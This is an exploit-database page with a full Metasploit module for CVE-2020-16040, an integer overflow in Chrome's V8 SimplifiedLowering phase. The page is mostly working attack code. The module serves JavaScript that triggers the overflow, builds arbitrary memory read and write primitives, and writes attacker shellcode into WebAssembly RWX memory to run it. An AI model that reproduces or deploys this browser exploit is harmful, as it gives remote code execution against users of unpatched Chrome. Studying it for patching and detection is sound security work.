Google Chrome SimplfiedLowering Integer Overflow

2021.04.12
Credit: Rajvardhan Agarwal
Risk: High
Local: No
Remote: Yes
CVE: CVE-2020-16040
CWE: CWE-98
CWE-189


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Post::File include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase', 'Description' => %q{ This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit). The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan. It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1. This is abused to gain arbitrary read/write into the isolate region. Then an ArrayBuffer can be used to achieve absolute arbitrary read/write. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rajvardhan Agarwal (r4j)', # exploit ], 'References' => [ ['CVE', '2020-16040'], ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'], ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'], ['URL', 'https://faraz.faith/2021-01-07-cve-2020-16040-analysis/'], ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1150649'], ], 'Arch' => [ ARCH_X64 ], 'DefaultTarget' => 0, 'Targets' => [ ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }], ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }], ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }], ], 'DisclosureDate' => '2020-11-19' ) ) end def on_request_uri(cli, request) print_status("Sending #{request.uri} to #{request['User-Agent']}") shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '') jscript = <<~JS var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var wasm_func = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); var shellcode = new Uint8Array([#{shellcode}]); var shellbuf = new ArrayBuffer(shellcode.length); var dataview = new DataView(shellbuf); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } function foo(a) { var y = 0x7fffffff; if (a == NaN) y = NaN; if (a) y = -1; let z = y + 1; z >>= 31; z = 0x80000000 - Math.sign(z|1); if(a) z = 0; var arr = new Array(0-Math.sign(z)); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } try { for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); } catch (e) { location.reload(); } var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return ftoi(fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let buf_addr = addrof(shellbuf); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint8(i, shellcode[i]); } } var rwx_page_addr = arbread(addrof(wasm_instance) + 0x68n); copy_shellcode(rwx_page_addr, shellcode); wasm_func(); JS html = <<~HTML <html> <head> <script> #{jscript} </script> </head> <body> </body> </html> HTML send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' }) end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top